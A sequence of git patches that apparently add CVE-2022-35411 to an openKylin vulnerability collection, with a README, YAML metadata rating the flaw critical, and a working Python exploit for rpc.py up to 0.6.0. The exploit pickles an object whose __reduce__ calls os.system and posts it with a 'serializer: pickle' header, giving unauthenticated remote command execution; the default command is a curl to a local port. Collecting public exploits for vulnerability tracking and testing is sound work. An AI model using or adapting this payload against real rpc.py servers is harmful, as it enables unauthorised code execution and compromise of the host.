From da838b8ab14f94a87d272bcb74c4b6f62c98a58e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:36:03 +0000 Subject: [PATCH 01/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20python?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/.keep diff --git a/cve/python/.keep b/cve/python/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e38e5e2130402a7dbf335c617d27a8ff946b447c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:37:25 +0000 Subject: [PATCH 02/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/2022/.keep diff --git a/cve/python/2022/.keep b/cve/python/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 0c84289dab108e7368799632cecaac134fc41d19 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:37:36 +0000 Subject: [PATCH 03/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-35411?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/CVE-2022-35411/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/2022/CVE-2022-35411/.keep diff --git a/cve/python/2022/CVE-2022-35411/.keep b/cve/python/2022/CVE-2022-35411/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From c7033d86b9f8b3e91c858e7b4f991be521b12be0 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:38:10 +0000 Subject: [PATCH 04/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/2022/yaml/.keep diff --git a/cve/python/2022/yaml/.keep b/cve/python/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a1763ed3059e76b856497254e7912322689e1252 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:38:22 +0000 Subject: [PATCH 05/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/2022/.keep diff --git a/cve/python/2022/.keep b/cve/python/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 203a681d25f902eb4c4cb46cbe172e15bd9dc731 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:38:58 +0000 Subject: [PATCH 06/14] poc Signed-off-by: fanyunpeng --- .../2022/CVE-2022-35411/CVE-2022-35411.py | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 cve/python/2022/CVE-2022-35411/CVE-2022-35411.py diff --git a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py new file mode 100644 index 00000000..467cc175 --- /dev/null +++ b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py @@ -0,0 +1,52 @@ +# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 2022-07-12 +# Exploit Author: Elias Hohl +# Vendor Homepage: https://github.com/abersheeran +# Software Link: https://github.com/abersheeran/rpc.py +# Version: v0.4.2 - v0.6.0 +# Tested on: Debian 11, Ubuntu 20.04 +# CVE : CVE-2022-35411 + +import requests +import pickle + +# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py + +HOST =3D "127.0.0.1:65432" + +URL =3D f"http://{HOST}/sayhi" + +HEADERS =3D { + "serializer": "pickle" +} + + +def generate_payload(cmd): + + class PickleRce(object): + def __reduce__(self): + import os + return os.system, (cmd,) + + payload =3D pickle.dumps(PickleRce()) + + print(payload) + + return payload + + +def exec_command(cmd): + + payload =3D generate_payload(cmd) + + requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) + + +def main(): + exec_command('curl http://127.0.0.1:4321') + # exec_command('uname -a') + + +if __name__ =3D=3D "__main__": + main() \ No newline at end of file -- Gitee From 69eda5626a071e9c7a9faa3d6a4a791e760a4d3b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:39:07 +0000 Subject: [PATCH 07/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/2022/CVE-2022-35411/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/CVE-2022-35411/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/2022/CVE-2022-35411/.keep diff --git a/cve/python/2022/CVE-2022-35411/.keep b/cve/python/2022/CVE-2022-35411/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a0f101be0907720a642b1c43a820ef57bb31a9a3 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:41:27 +0000 Subject: [PATCH 08/14] add cve/python/2022/CVE-2022-35411/README.md. Signed-off-by: fanyunpeng --- cve/python/2022/CVE-2022-35411/README.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cve/python/2022/CVE-2022-35411/README.md diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md new file mode 100644 index 00000000..607a59d0 --- /dev/null +++ b/cve/python/2022/CVE-2022-35411/README.md @@ -0,0 +1,18 @@ +# rpc.py 0.6.0 - Remote Code Execution (RCE) +Google Dork: N/A +Date: 2022-07-12 +Exploit Author: Elias Hohl +Vendor Homepage: https://github.com/abersheeran +Software Link: https://github.com/abersheeran/rpc.py +Version: v0.4.2 - v0.6.0 +Tested on: Debian 11, Ubuntu 20.04 +CVE : CVE-2022-35411 +# Usage +``` +python CVE-2022-35411.py +``` +# reference +http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html +https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory +https://github.com/ehtec/rpcpy-exploit Third Party Advisory +https://medium.com/@elias.hohl/remote-code-execution-0-day-in-rpc-py-709c76690c30 \ No newline at end of file -- Gitee From 2be571863703e0a8571e6ff4d022b28f3dbe6243 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:41:48 +0000 Subject: [PATCH 09/14] update cve/python/2022/CVE-2022-35411/README.md. Signed-off-by: fanyunpeng --- cve/python/2022/CVE-2022-35411/README.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md index 607a59d0..fbc23347 100644 --- a/cve/python/2022/CVE-2022-35411/README.md +++ b/cve/python/2022/CVE-2022-35411/README.md @@ -1,12 +1,12 @@ # rpc.py 0.6.0 - Remote Code Execution (RCE) -Google Dork: N/A -Date: 2022-07-12 -Exploit Author: Elias Hohl -Vendor Homepage: https://github.com/abersheeran -Software Link: https://github.com/abersheeran/rpc.py -Version: v0.4.2 - v0.6.0 -Tested on: Debian 11, Ubuntu 20.04 -CVE : CVE-2022-35411 +Google Dork: N/A +Date: 2022-07-12 +Exploit Author: Elias Hohl +Vendor Homepage: https://github.com/abersheeran +Software Link: https://github.com/abersheeran/rpc.py +Version: v0.4.2 - v0.6.0 +Tested on: Debian 11, Ubuntu 20.04 +CVE : CVE-2022-35411 # Usage ``` python CVE-2022-35411.py -- Gitee From 7367f27c085ee0b7c3007e2675ebe866928c436e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:49:22 +0000 Subject: [PATCH 10/14] add cve/python/2022/yaml/CVE-2022-35411.yaml. Signed-off-by: fanyunpeng --- cve/python/2022/yaml/CVE-2022-35411.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cve/python/2022/yaml/CVE-2022-35411.yaml diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml new file mode 100644 index 00000000..d1b35d84 --- /dev/null +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-35411 +source: https://www.exploit-db.com/exploits/50983 +info: + name: python中的rpc库。 + severity: critical + description: + rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. + scope-of-influence: + rpc.py v0.4.2 - v0.6.0 + reference: + - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html + - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd + - https://github.com/ehtec/rpcpy-exploit + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-35411 + cwe-id: None + cnvd-id: None + kve-id: None + tags: + - 远程代码执行 -- Gitee From dddc281a43a1642c8f673ef40f51ca0c8ae2caa7 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:50:06 +0000 Subject: [PATCH 11/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/2022/yaml/.keep diff --git a/cve/python/2022/yaml/.keep b/cve/python/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From dd09aeb67e5e58e30a2ac1bd50e5c293a993644b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:50:27 +0000 Subject: [PATCH 12/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/.keep diff --git a/cve/python/.keep b/cve/python/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6db8bffe310000f8e0ee693b41502a799f6e7e4f Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:51:30 +0000 Subject: [PATCH 13/14] update openkylin_list.yaml. Signed-off-by: fanyunpeng --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index caeacc6e..6f53e1c5 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -74,6 +74,8 @@ cve: polkit: - CVE-2021-4034 - CVE-2021-4115 + python: + - CVE-2022-35411 vim: - CVE-2021-3778 - CVE-2022-0351 -- Gitee From bb583ddf24b9c9f83e759b787ad559fefdf2de17 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Fri, 17 Mar 2023 05:30:27 +0000 Subject: [PATCH 14/14] update cve/python/2022/yaml/CVE-2022-35411.yaml. Signed-off-by: fanyunpeng --- cve/python/2022/yaml/CVE-2022-35411.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml index d1b35d84..3e14c184 100644 --- a/cve/python/2022/yaml/CVE-2022-35411.yaml +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -1,7 +1,7 @@ id: CVE-2022-35411 source: https://www.exploit-db.com/exploits/50983 info: - name: python中的rpc库。 + name: python中的rpc库,rpc是远程过程调用(Remote Procedure Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。 severity: critical description: rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. -- Gitee